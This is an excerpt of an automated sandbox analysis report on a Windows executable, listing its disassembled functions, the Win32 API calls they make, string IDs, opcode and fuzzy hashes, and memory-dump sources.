                                                    Similarity
                                                    • API ID:
                                                    • String ID: @U=u$hW
                                                    • API String ID: 0-4076565667
                                                    • Opcode ID: 33670be488ecd32b1ab21d8feea01334d6d353c80317ea20c789fe5cde22d995
                                                    • Instruction ID: 4e934c3d95dbb9c07f38d77c105c2fcb4670c1409a0298857a973f6b3705d1a9
                                                    • Opcode Fuzzy Hash: 33670be488ecd32b1ab21d8feea01334d6d353c80317ea20c789fe5cde22d995
                                                    • Instruction Fuzzy Hash: 0541C235D09104AFD724DFA8CC88FE9BBAAEB49310F154267F816A73E1C730AE51DA51
                                                    Function 006DB69E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(007157B0,00000000,00E15768,?,?,007157B0,?,006DB5A8,?,?), ref: 006DB712
                                                    • EnableWindow.USER32(00000000,00000000), ref: 006DB736
                                                    • ShowWindow.USER32(007157B0,00000000,00E15768,?,?,007157B0,?,006DB5A8,?,?), ref: 006DB796
                                                    • ShowWindow.USER32(00000000,00000004,?,006DB5A8,?,?), ref: 006DB7A8
                                                    • EnableWindow.USER32(00000000,00000001), ref: 006DB7CC
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 006DB7EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 642888154-2594219639
                                                    • Opcode ID: 7dac9ec9cc19d23f07e71dc67330e1bd7a52a21a2d2f40872cc84d3e311b76c0
                                                    • Instruction ID: 120b293c4bcbc668e6b660db646c7af4a1dd12b087b00ab4e5d238872d817db7
                                                    • Opcode Fuzzy Hash: 7dac9ec9cc19d23f07e71dc67330e1bd7a52a21a2d2f40872cc84d3e311b76c0
                                                    • Instruction Fuzzy Hash: 5D417F34A01240EFDB22CF24D499BD47BE2FF85310F1951BAE9598F7A6C731A856CB50
                                                    Function 006D7291 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006D72AA
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D7351
                                                    • IsMenu.USER32(?), ref: 006D7369
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006D73B1
                                                    • DrawMenuBar.USER32 ref: 006D73C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0$hW
                                                    • API String ID: 3866635326-580508736
                                                    • Opcode ID: 0eaa4756fcd897180c764a412a5227013d51ae4b57f436afdfaca7cd104a762d
                                                    • Instruction ID: 320aadc836f887f3aff7383e0fb8ff9ff8bcb1f9aa4e0832f40f2aa536ea8d47
                                                    • Opcode Fuzzy Hash: 0eaa4756fcd897180c764a412a5227013d51ae4b57f436afdfaca7cd104a762d
                                                    • Instruction Fuzzy Hash: 70412675A04209EFDB20DF54D884ADABBFAFB04311F15952AFD0597350E730AD50DB91
                                                    Function 006B2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 006B3033
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 47031acc5cbc831c925482fa1e4e9aef64ec4a3c96eb9a58c660cb09f132f360
                                                    • Instruction ID: bd44dc4e53bfa94d5395f6c5f486013dcde8f8e0efa0fad76136b1927166f906
                                                    • Opcode Fuzzy Hash: 47031acc5cbc831c925482fa1e4e9aef64ec4a3c96eb9a58c660cb09f132f360
                                                    • Instruction Fuzzy Hash: 6E1138B1748357BAD764AA14EC82CEB67DD9F19320B10402AFA04663C1DA646F8147A5
                                                    Function 006B42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006B4312
                                                    • LoadStringW.USER32(00000000), ref: 006B4319
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006B432F
                                                    • LoadStringW.USER32(00000000), ref: 006B4336
                                                    • _wprintf.LIBCMT ref: 006B435C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006B437A
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 006B4357
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 45c5cf571851be3b502897abfb2e070dd550dcc452a66064ddf52d67fdf9c93c
                                                    • Instruction ID: 827d053d988de105890f6d48508b303b56e34146afc54729463ba06045ee0532
                                                    • Opcode Fuzzy Hash: 45c5cf571851be3b502897abfb2e070dd550dcc452a66064ddf52d67fdf9c93c
                                                    • Instruction Fuzzy Hash: DB01D6F2C00208BFE7519BA0DD89EF7776DEB08300F0045A2B74AE2151EA749E854B70
                                                    Function 00652A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000), ref: 00652ACF
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00652B17
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000), ref: 0068C21A
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000), ref: 0068C286
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 3c115a6c7938b1dc6415f26166fc5ffcf30dea880b62eb561aa058ad024224ba
                                                    • Instruction ID: 7a0975eaf58b10305a9ce445ef010a88375334f5651bf0bfa195e9df45144fe4
                                                    • Opcode Fuzzy Hash: 3c115a6c7938b1dc6415f26166fc5ffcf30dea880b62eb561aa058ad024224ba
                                                    • Instruction Fuzzy Hash: C6412F306046C2DAC7399B28DCBCBEB7B93AB47315F14C51DE847827A1C635994ED720
                                                    Function 006B70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 006B70DD
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006B7114
                                                    • EnterCriticalSection.KERNEL32(?), ref: 006B7130
                                                    • _memmove.LIBCMT ref: 006B717E
                                                    • _memmove.LIBCMT ref: 006B719B
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 006B71AA
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006B71BF
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006B71DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: 93d2698992e9cc6a03af85fc14c653b2651654a43badaec5514915920af96059
                                                    • Instruction ID: a8974e9bcf949dca8441b72105ea29553165f9d1dddf6826273eb209baad6dea
                                                    • Opcode Fuzzy Hash: 93d2698992e9cc6a03af85fc14c653b2651654a43badaec5514915920af96059
                                                    • Instruction Fuzzy Hash: 9F317E71900205EBDB50DFA4DC85AAEB77AEF45310F1481BAF904AB246DB309E50CBA4
                                                    Function 006BEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                    • _wcstok.LIBCMT ref: 006BEC94
                                                    • _wcscpy.LIBCMT ref: 006BED23
                                                    • _memset.LIBCMT ref: 006BED56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    • Opcode ID: ece9048602d196bdc040ea2f9c57f0779d6a822cee56222754efb08af790d1ad
                                                    • Instruction ID: eebe7bff39606e35393ce72968c815ed0160ec84744fbb15ba79e5fcf7f893ae
                                                    • Opcode Fuzzy Hash: ece9048602d196bdc040ea2f9c57f0779d6a822cee56222754efb08af790d1ad
                                                    • Instruction Fuzzy Hash: 70C19170508301DFC794EF24D855AAAB7E6FF45310F00492DF89A9B2A2DB31EC49CB96
                                                    Function 006C6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006C6C00
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006C6C21
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C6C34
                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 006C6CEA
                                                    • inet_ntoa.WSOCK32(?), ref: 006C6CA7
                                                      • Part of subcall function 006AA7E9: _strlen.LIBCMT ref: 006AA7F3
                                                      • Part of subcall function 006AA7E9: _memmove.LIBCMT ref: 006AA815
                                                    • _strlen.LIBCMT ref: 006C6D44
                                                    • _memmove.LIBCMT ref: 006C6DAD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3619996494-0
                                                    • Opcode ID: 49a15224a4262368cbdd4aeeb17b4723e33fe11d2748286a05376dd157f729e9
                                                    • Instruction ID: f07f22a2c0408342caa43c7594148d637f5f99757e010faae2c7fbe48e37a64c
                                                    • Opcode Fuzzy Hash: 49a15224a4262368cbdd4aeeb17b4723e33fe11d2748286a05376dd157f729e9
                                                    • Instruction Fuzzy Hash: 5981D271204300ABD750EB24CC85FBBB7AAEF84714F14491DF9569B2A2DB70ED05CB69
                                                    Function 00651424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 75eb898167eab03b01b7eb4bc44aee52d591aeac96621de9eb5c8af04fae3dbb
                                                    • Instruction ID: a50f22502fa6921d3b3ff13a6f306b83b99c1c0830c118a0896f8fa3eb951b91
                                                    • Opcode Fuzzy Hash: 75eb898167eab03b01b7eb4bc44aee52d591aeac96621de9eb5c8af04fae3dbb
                                                    • Instruction Fuzzy Hash: BD717B30900109EFCB04DF98CC49AFEBBBAFF86315F148159F915AA251D734AA56CBA4
                                                    Function 006CF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006CF448
                                                    • _memset.LIBCMT ref: 006CF511
                                                    • ShellExecuteExW.SHELL32(?), ref: 006CF556
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                    • GetProcessId.KERNEL32(00000000), ref: 006CF5CD
                                                    • CloseHandle.KERNEL32(00000000), ref: 006CF5FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
                                                    • Opcode ID: 9847c556ce1c71bc91bad33615123080de0a1118817e2d75a582be1ef9acba0f
                                                    • Instruction ID: 15d09e8aa83dec1cc7635da812c49459ae218272608ff1cf65f9f735184e558d
                                                    • Opcode Fuzzy Hash: 9847c556ce1c71bc91bad33615123080de0a1118817e2d75a582be1ef9acba0f
                                                    • Instruction Fuzzy Hash: F4618B75A00619DFCB14EF64C881AAEBBF6FF49310F14846DE85AAB351CB30AD45CB94
                                                    Function 006B0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 006B0F8C
                                                    • GetKeyboardState.USER32(?), ref: 006B0FA1
                                                    • SetKeyboardState.USER32(?), ref: 006B1002
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 006B1030
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 006B104F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 006B1095
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006B10B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 1c5a715ee5f66b8eb6b2271f8397030cbf6141fae5f9b479b0603892e0348cd0
                                                    • Instruction ID: 12d3fd74f2b4f815a62ac21512030d792c80743fda66746b5e62485422f6ddc3
                                                    • Opcode Fuzzy Hash: 1c5a715ee5f66b8eb6b2271f8397030cbf6141fae5f9b479b0603892e0348cd0
                                                    • Instruction Fuzzy Hash: A851F1E0A046D53DFB3252388C25BF7BEAB5B07304F488589E1D54A9C3C6A8DCD5D751
                                                    Function 006B0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 006B0DA5
                                                    • GetKeyboardState.USER32(?), ref: 006B0DBA
                                                    • SetKeyboardState.USER32(?), ref: 006B0E1B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006B0E47
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006B0E64
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006B0EA8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006B0EC9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 7cbf9f059c3c5f904f2ab1bf9c4ec9508588a37389625aa16a2cc24ea3b60b0d
                                                    • Instruction ID: 4a2469c79836f378be95ea306e80c82671c4cdfbb4ce8377ae7301999bd6ad1b
                                                    • Opcode Fuzzy Hash: 7cbf9f059c3c5f904f2ab1bf9c4ec9508588a37389625aa16a2cc24ea3b60b0d
                                                    • Instruction Fuzzy Hash: 0351C1E0A446D53DFB3283648855BFBBFAA6F06300F088889E1D54A9C2D395EDD9D760
                                                    Function 006D97F4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(00E1DB70,?), ref: 006D9863
                                                    • ScreenToClient.USER32(00000002,00000002), ref: 006D9896
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 006D9903
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID: @U=u$hW
                                                    • API String ID: 3880355969-4076565667
                                                    • Opcode ID: 6d17aaa0fb528532325cfd87b9d7bc2a0254edeccab2e75f678c1a2388f1339d
                                                    • Instruction ID: 61abf83a2f7483afef3cd1c1dfa42a4143f2b8297ead50c264adbb6787e5364c
                                                    • Opcode Fuzzy Hash: 6d17aaa0fb528532325cfd87b9d7bc2a0254edeccab2e75f678c1a2388f1339d
                                                    • Instruction Fuzzy Hash: 41512C34E00209EFCB14CF58C890AEE7BB6FB55760F14865AF8559B3A0D731AD41DBA0
                                                    Function 006B55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 50b18faea9ef105e132a86d6901fd9a2dded0f9d71f94b91fdc0b6235c2bec54
                                                    • Instruction ID: 6dea8a567f2afc4a4bce5cf66d8fa1330503db0cfbdbd0ca40c1167bb65ffe6a
                                                    • Opcode Fuzzy Hash: 50b18faea9ef105e132a86d6901fd9a2dded0f9d71f94b91fdc0b6235c2bec54
                                                    • Instruction Fuzzy Hash: 8A419565C10614B6CB51EBB48C46ACFB3BA9F04310F50C96AE51DE3221FB34A395C7AE
                                                    Function 006AD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006AD5D4
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006AD60A
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006AD61B
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006AD69D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
